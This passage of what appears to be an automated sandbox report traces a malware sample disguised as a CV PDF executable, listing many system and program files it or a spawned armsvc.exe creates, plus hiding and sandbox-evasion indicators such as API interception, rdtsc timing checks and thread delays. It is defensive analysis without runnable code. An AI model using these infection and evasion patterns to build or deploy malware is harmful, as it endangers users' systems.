            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, File created: \cv_sales representative - job request pdf.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Mozilla Firefox\pingsender.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\vds.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\snmptrap.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\Spectrum.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Windows Media Player\wmpnetwk.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\Locator.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\7-Zip\7z.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, File created: C:\Windows\System32\AppVClient.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Mozilla Firefox\crashreporter.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\SysWOW64\perfhost.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\7-Zip\7zG.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\msiexec.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\TieringEngineService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Mozilla Firefox\firefox.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Mozilla Firefox\updater.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\7-Zip\Uninstall.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\FXSSVC.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe, File created: C:\Windows\System32\sppsvc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\SensorDataService.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\msdtc.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\wbem\WmiApSrv.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exe, File created: C:\Windows\System32\alg.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\7-Zip\7zFM.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, File created: C:\Windows\System32\VSSVC.exe
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\AgentService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\TieringEngineService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to dropped file
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SensorDataService.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
            Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\TieringEngineService.exeFile created: C:\System Volume Information\Heat\
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004048D7
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00485376
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeCode function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00423187
            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\mfpmp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\CV_Sales Representative - Job Request PDF.exeAPI/Special instruction interceptor: Address: B36E14
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D324
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D7E4
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D944
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D504
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D544
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372D1E4
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC3730154
            Source: C:\Windows\SysWOW64\mfpmp.exeAPI/Special instruction interceptor: Address: 7FFCC372DA44
            Source: CV_Sales Representative - Job Request PDF.exe, 00000000.00000002.1187258830.0000000000C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXEYJ
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03A7096E rdtsc 3_2_03A7096E
            Source: C:\Windows\System32\msdtc.exeWindow / User API: threadDelayed 490
            Source: C:\Windows\SysWOW64\perfhost.exeWindow / User API: threadDelayed 9681
            Source: C:\Windows\SysWOW64\mfpmp.exeWindow / User API: threadDelayed 5081
            Source: C:\Windows\SysWOW64\mfpmp.exeWindow / User API: threadDelayed 4890
